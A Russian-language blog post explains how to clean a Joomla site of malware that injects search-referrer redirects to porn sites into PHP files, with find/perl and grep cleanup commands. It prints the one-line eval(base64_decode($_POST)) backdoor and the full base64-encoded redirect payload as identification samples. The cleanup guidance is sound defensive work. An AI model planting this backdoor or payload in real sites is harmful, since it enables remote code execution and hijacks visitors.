Как убрать вирус на сайте joomla

Печать | Просмотров: 1351

Уже довольно давно мучает нас один вирус. Суть его работы во внедрении во все php файлы кода, перебрасывающего пользователей из поисковиков на некие порно-ресурсы. Если же заходить напрямую вбив адрес в адресуню строку, то все открывается без проблем.

Само же заражение происходит через файл post.php или pst.php или какое то другое название, содержащий одну строку

eval (base64_decode(<!-- $_РOST["рhр"] -->));

Этот файл как правило лежит в папке images.

Как понять, что у вас именно этот вирус? Откройте файл index.php в корне сайта и скорее всего в самом начале вы увидете что-то вроде:

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnA Nfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVd FRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddF Ow0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsG KaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwis YmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyR ZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0x cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiEE KSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmt ZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBy vbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3Ryu KCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kE ZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSByy vciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmi ZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3p RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmh VyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiw KSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxv  Y2F0aW9uOiBodHRwOi8vbWlua29mLnNlbGxjbGFzc2ljcy5jb20vIik7DQple Gl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));

Соответственно избавиться от вируса можно прошерстив все файлы и удалив из них данный код.

Можно поступить двумя методами:

Скачать весь сайт на компьютер и, воспользовавшись утилитами типа Text Replacer и ему подобными, удалить всю эту гадость из файлов. Далее закачать все на место
Если есть доступ к SSH, находясь в корне сайта, запустить команду
find . -type f -name '*.php' -exec perl -pi -e 's/eval\(base64_decode\(\"DQp.*KfQ0KfQ==\"\)\)\;//g' '{}' \;

Она найдет все файлы с расширением php и удалит в них искомый вредоносный код

Второй вариант работает очень быстро, но не всем подойдет.

И не забудьте поменять пароль к FTP и админке сайта. Утечка скорее всего происходит через них. Ну и проверить комп на вирусы не помешает тоже.

Ещё одна полезная комбинация команд позволяет искать текст внутри файлов для выявления вируса

find . -type f -name '*.php' -exec grep -l 'искомая строка' {} \;

 

amiseo.ru